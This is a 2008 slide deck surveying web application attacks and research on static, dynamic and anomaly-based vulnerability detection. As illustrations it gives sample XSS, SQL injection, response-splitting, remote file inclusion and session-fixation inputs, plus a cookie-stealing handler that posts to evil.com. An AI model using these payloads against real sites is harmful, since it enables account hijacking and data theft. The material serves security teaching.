Vulnerability Analysis of Web-based Applications Yi tang Email

Vulnerability Analysis of Web-based Applications Yi tang Email: tangyi@ymail. com Dec. 18/2008

Outline 1. 2. 3. 4. 5. Current web security trend Web Technologies Web based attacks Vulnerability Analysis Conclusion 2

web security n As web applications for critical services has increased, attacks against web has grown as well. A series of characteristics make it a valuable for an attacker. n n n web applications are often designed to be widely accessible Web applications often interface with back-end component containing sensitive data most popular web languages are currently easy enough to allow novices to start their own applications 3/50

Trend n n In the ﬁrst semester of 2005, Symantec cataloged 1, 100 new vulnerabilities, which represent well over half of all new vulnerabilities, as affecting web-based applications. A new statistic from white book of Symantec threaten report. 4/50

Outline 1. 2. 3. 4. 5. Current web security trend Web technologies Web based attacks Vulnerability Analysis Conclusion 5

Common Gateway Interface n n One of the first mechanisms enabled dynamic content : Common Gateway Interface (CGI) It defines a mechanism that a server can use to interact with external applications. Disadvantage: requires to create a new process and executed for each request Server-specific APIs: n n Low initialization cost and can perform more general functionalities than CGI-based programs. complex when writing a program, it involves some knowledge of the server’s inner workings. 6/50

users to authenticate tasks of parameter decoding and session manage 7/50

Embedded Web Application Frameworks n n n Today, most web application implementation is a middle way between original CGI and server specific APIs. an interpreter or compiler used to encode the application’s components and define rules that govern the interaction between the server and the application’s components. Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python. (interpreted, object-oriented, loosely typed) 8/50

A sample PHP program parameters of requests through HTTP GET method are available in the $ GET array users input are first checked using the validate function native support for sessions, easy to keep track different requests 9/50

Outline 1. 2. 3. 4. 5. Current web security trend Web technologies Web based attacks Vulnerability Analysis Conclusion 10

Attacks n n n Web-based applications have fallen prey to a variety of different attacks that violate different security properties. This survey focuses on attacks behave in unforeseen ways to disclose sensitive information or execute commands on behalf of the attacker. Currently, most of attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation. 11/50

Interpreter Injection n Many dynamic languages include functions to dynamically compose and interpret code. n n include and require - Includes and evaluates a file as PHP code. eval, preg_replace - Evaluates a string as PHP code. exec, passthru, system, popen, shell_exec, popen, pcntl_exec, proc_open and the backtick - Executes its input as a shell command. Attack on the server 12/50

Sample of interpreter injection in Double Choco Latte url Server without fully filtering the parameter of menu. Action 13/50

Filename Injection n Most languages of web are allowed to dynamically include files to interpret content or present them to users. E. g. to generate different page content depending on user’s preferences, such as for internationalization purposes. Because PHP allows for the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker’s control. 14/50

a filename injection vulnerability in txt. Forum n n In txt. Forum, pages are divided in parts, e. g. , header, footer, forum view, and can be customized by using different “skins, ” which are different combination of colors, fonts, and other presentation parameters. Skin with value http: //[attacker-site] leads to the execution of the code at http: //[attacker-site]/header. tpl 15/50

Script Cross-site attack （XSS） n n In the attack, an attacker forces a client, typically a web browser, to execute attacker-supplied executable code, typically Java. Script code, which runs in the context of a trusted web site. Sample: http: //www. vulnerable. site/welcome. cgi? name=<script>alert (document. cookie)</script> 16/50

Impact of XSS-Attacks Access to authentication credentials for Web application n Cookies, Username and Password Ø XSS is not a harmless flaw ! n Normal users Ø Access to personal data (Credit card, Bank Account) Ø Access to business data (Bid details, construction details) Ø Misuse account (order expensive goods) n High privileged users Ø Control over Web application Ø Control/Access: Web server machine Ø Control/Access: Backend / Database systems 17

SQL Injection n n A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation. This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application. $activate = $_GET [" activate "]; $result = dbquery (" SELECT * FROM new_users " , " WHERE user_code =’ $activate ’"); where the activate parameter is set to the string ’ OR 1=1 -the query will return the content of the entire new users table. SELECT * FROM new_users WHERE user_code =‘ ‘ OR 1=1 18/50

SQL Injection 19/50

Session Hijacking n n HTTP is a stateless protocol, no built-in mechanism allows application to maintain state throughout a session. The session state can be maintained in different ways. n n It can be encoded in a document transmitted to the user in a way, such as cookie or HTML hidden form ﬁelds and sent back as part of later requests. n Problem: the cookie or hidden forms may be changed by dishonest users. each user is assigned a unique session ID n Problem: Session fixation 20/50

Session Hijacking n Session fixation: the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. http: //[target]/login. php? sessionid=1234 21/50

Response Splitting n n n the attacker is able to set the value of an HTTP header field, and the resulting response stream is interpreted by the attack target as two responses To perform response splitting the attacker must be able to inject data containing the header termination characters and the beginning of a second header. This is usually possible when user’s data is used (unsanitized) to determine the value of an HTTP header 22/50

Response Splitting <% response. send. Redirect (“/by_lang. jsp? lang =" + request. get. Parameter (" lang ")); %> Location: http: //vulnerable. com/by_lang. jsp? lang=en_US. However, if the lang= dummy%0 d%0 a Content-Length: %200 %0 d%0 a HTTP/1. 1%20200%20 OK%0 d%0 a Content-Type: %20 text/html%0 d%0 a Content-Length: %2019%0 d%0 a <html>New document</html> 23/50

Response Splitting n n Response Splitting often related to the attack of web cache poisoning Two condition: n n n a caching proxy server interprets the response stream as containing two documents associates the second one with the original request, then an attacker would be able to insert in the cache of the proxy a page of his choice in association to a URL in the vulnerable application. 24/50

Outline 1. 2. 3. 4. 5. Current web security trend Web technologies Web based attacks Vulnerability Analysis Conclusion 25

Vulnerability analysis n n vulnerability analysis refers to the process of assessing the security of an application through auditing of either the application’s code or the behavior for possible security problems. The identification of vulnerabilities in web applications can be performed following one of two orthogonal detection approaches: the negative (vulnerability based) approach and the positive (behavior based) approach. 26/50

Detection approach n n n Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications, to identify instances of the modeled vulnerabilities. Positive approach: builds models of the normal behavior of an application (eg. using machinelearning techniques) and then analyze the application behavior to identify any abnormality that might be caused by a security violation. Two fundamental analysis techniques that can be used to do the analysis : static analysis and dynamic analysis. 27/50

n n n Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. it does not require the application to be deployed and executed. Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run-time. It is less prone to false positives, since the analysis is done on run-time. In practice, hybrid approaches mixed both static and dynamic techniques, are frequently used to combine the strengths and minimize the limitations of the two approaches. 28/50

Outline Current web security trend Web Technologies Web based attacks Vulnerability Analysis 1. 2. 3. 4. 1. 2. 5. Negative approach Positive approach Conclusion 29

Negative approach: taint propagation n Most negative approaches assumes that vulnerabilities are the result of insecure data flow in applications. We attempt to identify when untrusted user input propagates to security-critical functions(sinks) without being properly checked and sanitized. taint propagation: data from input is marked as tainted and its propagation throughout the program is traced to check whether it can reach sinks. 30/50

Negative static Approaches n n n static analysis can be applied before the deployment. It does not require modification of the deployment environment. Currently focus on the analysis of applications written in PHP and Java It may require the source code of web site to do analysis. 31/50

Web. SSARI (WWW’ 04) n n n Web. SSARI (WWW’ 04) is one of the first works that applies taint propagation analysis in web security. Web. SSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection. The tool uses flow-sensitive, intra-procedural analysis based on a lattice model and typestate. n n Typestate: PHP is extended with two types: tainted and untainted, the tool keeps track the type-state of variables. In order to untaint the tainted data, the data has to be processed by a sanitization routine or cast to a safe type. 32/50

n It predefine 3 file: n n a file with preconditions to all sensitive functions (the sink) a file with of known sanitization functions, for untaited. a file specifying all possible sources of untrusted input When the tool finds tainted data reaches sinks, it automatically inserts sanitization routines. 33/50

If (A) { A=X; } else { if (B) { A=Y; } else { A=Z; } } Echo (A); If (C) { A X Y Z U T If (A) Typestate At every program point, the algorithm keeps a A=X; A X Y Z If (B) T T U T A X Y Z static invariant representing the most dangerous possible state at that point. A=Y; A=Z; U T A X Y Z T T U T Echo (A) A X Y Z T T U T If (C) Control ﬂow graph T=LUB(T, U, T)

If (A) { A=X; } else { if (B) { A=Y; } else { A=Z; } } Echo (A); If (C) { If (A) Typestate • Typestate offers a balance between precision and cost • Maintains a typestate for every diverging path A=X; If (B) A=X; – Increases precision If (B) – Induces memory cost • Merges typestate at execution merge points A=Y; A=Z; – Limits memory cost – Induces imprecision – Denies counterexample support Echo (A) If (C) • Web. SSARI incorporates flowtyping based on typestate Echo (A) sensitive If (C) Control ﬂow graph

Runtime Protection n n Different sanitization routines are automatically inserted just before vulnerable function calls Depending on the vulnerable function, one of the three following routines is inserted n n n HTML output sanitization Database command sanitization System command sanitization 36

System Implementation 37

Problem of Web. SSARI: n n n Uses intra-procedural algorithm and thus only models information flow not cross function boundaries. (Xie Usenix 06) All dynamic variables, arrays are considered tainted, reduce the accuracy of the analysis. Can not accurately tracking arrays, alias and object-oriented code. (Pixy Oakland 06 ) 38/50

Summary n n static analysis heavily depends on language specific parsers. It is not generally a problem for general purpose languages Web applications use dynamic scripting languages to facilitate the use of complex data structures, such as arrays and hash, hard to track. One main drawbacks of static analysis is its susceptibility to false positives caused by inevitable analysis imprecisions. . Precise evaluation of sanitization routines is more difficult. Just regular expression maybe not enough 39/50

Dynamic negative approach n n n Dynamic negative techniques is also based on taint analysis. Untrusted sources, sensitive sinks, and tainting propagates also need to be modeled Instead of running analysis on source code, program or interpreter are extended to collect the information and the tainted data is tracked as execution. Perl’s Taint mode: Perl interpreter is invoked with the –T option it makes sure that no data obtained from the outside environment can be used in security critical functions (too conservative) 40/50

“Automatically Hardening Web Applications Using Precise Tainting”, SEC’ 05 n n Propose modification of the PHP interpreter to dynamically track tainted data in PHP programs. Fully automated Aware of application semantics Replace PHP interpreter with a modified interpreter that: n n Keeps track of which information comes from untrusted sources (precise tainting) Checks how untrusted input is used 41/50

file. php 2 3 File System Client 1 4 PHP Interpreter PHPrevent 8 5 HTTP Server Database 7 Web Server 6 System APIs

Coarse Grain Tainting n n n Provided by many scripting languages (Perl, Ruby) Untrusted input is tainted Everything touched by tainted data becomes tainted $query = "SELECT real_name FROM users WHERE user = '". $user. "'AND pwd = '". $pwd. "' "; Entire $query string is tainted

Precise Tainting • Untrusted input is tainted • Taint markings are maintained at character level – Depends on semantics of program • Only really tainted data is tainted $query = "SELECT real_name FROM users WHERE user = '". $user. "'AND pwd = '". $pwd. "' "; $query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- '; 'AND pwd = '' ";

Precise Checking n n Wrappers around PHP functions that handle updating and checking precise taint information Conservative: no false negatives while minimizing false positives n Behavior only changes when an attack is likely

Preventing SQL Injection n n Parse the query using the SQL parser: identify interpreted text Disallow SQL keywords or delimiters in interpreted text that is tainted n n Query is not sent to database Error response it returned "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- '; ' AND pwd = '' ";

Preventing PHP Injection n Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state n n place wrappers around these functions to enforce this rule php. BB attack prevented by wrappers around preg_replace

Preventing Cross Site Scripting n Wrappers around output functions n n Buffer output and then parse the tainted output with HTML Tidy Our defense takes advantage of precise tainting information to identify web page output generated from untrusted sources. n n Dangerous content was determined by examining HTML grammar Sanitize it by removing tags <b>Hello</b> Safe <b onmouseover= 'location. href= "http: //evil. com/steal. php? " + document. cookie'>Hello</b> Unsafe

Summary of dynamic negative method n n a modified interpreter can be applied to all web applications, all required information is available as execution result. Further, no complex analysis for features such as alias analysis is required. However, no guarantees to all cases 49/50

Summary of negative method n n If taint propagation is done statically, the precision highly depends on the ability of dealing the complexities of dynamic features. Precise evaluation of sanitization routines is especially important If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability and performance arise. 50/50

Outline Current web security trend Web Technologies Web based attacks. Vulnerability Analysis 1. 2. 3. 4. 1. 2. 5. Negative approach Positive approach Conclusion 51

Positive Approaches n n Based on deriving models of the “normal” behavior Assumption: n n n Deviations mean attacks or vulnerabilities; attacks create an anomalous manifestation; an anomaly detection system utilizes a number of statistical models to identify anomalous events in a set of web requests that use parameters to pass values to the server-side components of a webbased application 52/50

Anomaly-based n n n Based on assumption that normal traffic can be defined Attack patterns will differ from such ‘normal’ traffic Anomaly-based detection system will go through a learning phase to register such ‘normal’ traffic Analysis will be done for individual field attributes as well as for entire query string This difference should be able to be expressed quantitatively

Anomaly Detection of Web-based Attacks Cristopher Kruegel & Giovanni Vigna CCS ‘ 03 n n n it is hard to keep intrusion detection signature sets updated with respect to the large numbers of vulnerabilities discovered daily. This paper presents an intrusion detection system that uses a number of different anomaly detection techniques to detect attacks against web servers and web-based applications. The anomaly detection system takes as input the web server log files which conform to the Common Log Format and produces an anomaly score for each web request. 54/50

Data Model n n Only GET requests with no header 169. 229. 60. 105 − johndoe [6/Nov/2002: 23: 59 − 0800 "GET /scripts/access. pl? user=johndoe&cred=admin" 200 2122 a 1=v 1 Path n n Only Query string, no path For query q, Sq={a 1, a 2} a 2=v 2 Query

Detection model n n Each model is associated with weight wm. Each model returns the probability pm. A value close to 0 indicates anomalous event i. e. a value of pm close to 1 indicates anomalous event. If the weighted score is greater than the detection threshold determined during the learning phase for that parameter, the anomaly detector considers the entire request anomalous and raises an alert.

Anomaly-based n Some of the attributes that could be analyzed are: n n n Input length Character distribution Parameter string structure Parameter absence or presence Order of parameters

Attribute Length n Normal Parameters n n Malicious activity n n Fixed sized tokens (session identifiers) Short strings (input from HTML form) So, doesn’t vary much associated with certain prg. E. g. for buffer overflow Goal: to approximate the actual but unknown distribution of the parameter lengths and detect deviation from the normal

Learning & Detection n Learning n Calculate mean and variance for the lengths l 1, l 2, . . . , ln for the parameters processed. n n N queries with this attribute Detection n Chebyshev inequality This computation bound has to be weak, to result in high degree of tolerance (very weak) Only obvious outliers are flagged as suspicious

Attribute character distribution n Attributes have regular structure, printable characters n n There are similarities between the character frequencies of query parameters. Relative character frequencies of the attribute are sorted in relative order Passwd – 112 97 115 119 110 0. 33 0. 17 0 255 times ICD(0) = 0. 33 & ICD(1) to ICD(4) = 0. 17 ICD(5)=0 n Normal n n freq. slowly decrease in value Malicious n n Drop extremely fast (peak cause by single character distrib. ) Nearly not at all (random values)

Why is it useful? n Cannot be evaded by some well-known attempts to hide malicious code in the string. n n Nop operation substituted by similar behavior r. A, 0) (add But not useful in when small routine change in the payload distribution

Learning and detection n Learning n n For each query attribute, its character distribution is stored ICD is obtained by averaging of all the stored character distributions q 1 . 5 . 25 0 0 q 2 . 75 . 2 . 1 0 0 q 3 . 25 0 avg . 5 . 22 . 08 0

Learning and detection (cont. . . ) n Pearson chi-square test Not necessary to operate on all values of ICD consider a small number of intervals, i. e. bins n Calculate observed and expected frequencies n n n Oi= observer frequencies for each bin Ei= relative freq of each bin * length of the attribute Compute chi-square Calculate probability from chi-square predefined table

Structural inference n n Structural is the regular grammar that describes all of its normal legitimate values. Why? ? n n Craft attack in a manner that makes its manifestation appear more regular. For example, non-printable characters can be replaces by groups of printable characters.

Learning and detection n Basic approach is to generalize grammar as long as it seems reasonable and stop before too much structural information is lost. MARKOV model and Bayesian probability NFA n n Each state S has a set of ns possible output symbols o which are emitted with the probability of ps(o). Each transition t is marked with probability p(t), likelihood that the transition is taken.

Learning and detection (cont. . . ) So, probability of ‘ab’ 0. 3 Start 0. 7 a|p(a) = 0. 5 b|p(b) = 0. 5 0. 2 a|p(a) = 1 0. 4 1. 0 c|p(c) = 1 b|p(b) = 1 1. 0 Terminal 1. 0 P(w) = (1. 0*0. 3*0. 5*0. 2*0. 5*0. 4)+ (1. 0*0. 7*1. 0*1. 0)

Learning and detection (cont. . . ) By adding the probabilities calculated for each input training element

Learning and detection (cont. . . ) n Aim to maximize the product. n n Conflict between simple models that tend to overgeneralize and models that perfectly fit the data but are too complex. Simple model- high probability, but likelihood of producing the training data is extremely low. So, product is low Complex model- low probability, but likelihood of producing the training data is high. Still product is low. Model starts building up and generating input data then the states starts building up using Viterbi algorithm.

Learning and detection (cont. . . ) n Detection n The problem is that even a legitimate input that has been regularly seen during the training phase may receive a very small probability values n n The probability values of all possible input words sum to 1 Model return value 1 if valid output otherwise 0 when the value cannot be derived from the given grammar

Token finder n n Whether the values of the attributes are from a limited set of possible alternatives (enumeration) When malicious user try to usually pass the illegal values to the application, the attack can b detected.

Learning and detection n Learning n n n Enumeration: when different occurrences of parameter values is bound by some threshold t. Random: when the no of different argument instances grows proportionally Calculate statistical correlation

Learning and detection (cont. . . ) < 0, enumeration > 0, random n Detection n If any unexpected happens in case of enumeration, then it returns 0, otherwise 1 and in case of randomness it always return 1.

Attribute presence of absence n n Client-side programs, scripts or HTML forms preprocess the data and transform in into a suitable request. Hand crafted attacks focus on exploiting a vulnerability in the code that processes a certain parameter value and little attention is paid on the order.

Learning and detection n Learning n n n Model of acceptable subsets Recording each distinct subset Sq={ai, . . . ak} of attributes that is seen during the training phase. Detection n n The algorithm performs for each query a lookup of the current attribute set. If encountered then 1 otherwise 0

Attribute order n n n Legitimate invocations of server-side programs often contain the same parameters in the same order. Hand craft attacks don’t To test whether the given order is consistent with the model deduced during the learning phase.

Learning and detection n Learning: n n A set of attribute pairs O such that: Each vertex vi in directed G is associated with the corresponding attribute ai. For every query ordered list is processed. Att. Pair (as, at) in this list, with s ~= t and 1<=s, t<=i, a directed edge is inserted into the graph from vs to vt.

Learning and detection (cont. . . ) n n Graph G contains all ordered constraints imposed by queries in the training data. Order is determined by n n n Directed edge Path Detection n n Given a query with attributes a 1, a 2, . . . , ai and a set of order constraints O, all the parameter pairs (aj, ak) with j~=k and 1 <= j, k <= I Violation then return 0 otherwise 1

Conclusions of this paper n n Anomaly-based intrusion detection system on web. Takes advantage of application-specific correlation between server-side programs and parameters used in their invocation. Parameter characteristics are learned from the input data. Tested on Google, and two universities in US and Europe

Summary positive approaches n Advantage: n n By specifying normal behavior, it can detect unknown attack Problem: n n the concept of normality is difficult to define vulnerable to mimicry attacks: detection threshold still requires manual intervention and substantial expertise. 79/50

Outline 1. 2. 3. 4. Current web security trend Web based attacks Vulnerability Analysis Conclusion 80

n n No method can be considered “the silver bullet”, many methods combine strengths from various techniques. Important to provide techniques to better model sanitization and to assess whether a sanitization operation is appropriate for the task at hand Challenges by novel web-specific attack techniques. Improper input validation are well-known and studied There is no standard dataset usable as base-line for evaluation. 81/50

Future our work n To get some static and dynamic method specially support the XSS script code detection. 82/50

Thank you! 83